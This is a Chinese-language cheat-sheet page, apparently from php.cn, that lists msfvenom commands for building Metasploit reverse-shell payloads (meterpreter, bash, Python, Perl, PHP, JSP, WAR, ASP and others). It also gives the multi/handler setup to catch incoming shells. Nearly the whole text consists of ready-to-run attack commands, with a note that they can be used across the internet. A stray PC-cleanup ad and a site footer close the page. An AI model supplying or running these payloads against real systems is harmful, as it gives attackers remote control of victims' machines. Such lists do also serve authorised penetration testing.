通常 metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(lhost、lport 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 lhost 应填写您的 ip 地址(如果在网络内进行攻击,则为 lan ip,如果通过 internet 进行攻击,则为 wan ip),并且 lport 应该是您希望重新连接的端口。
Linux
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f elf > shell.elf
Windows
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f exe > shell.exe
Mac
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f macho > shell.macho
PHP
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址> LPORT = <你的连接端口> -f raw > shell.php cat shell.php | pbcopy && echo '<?php' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f asp > shell.asp
JSP
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f raw > shell.jsp
War
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f war > shell.war
Python
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.py
Bash
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f raw > shell.sh
Perl
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.pl
Linux Based Shellcode
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>
Windows Based Shellcode
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>
Mac Based Shellcode
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f <语言>
设置 Metasploit 以接收传入的 shell
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z
完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '

以上就是收藏Metasploit payload的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号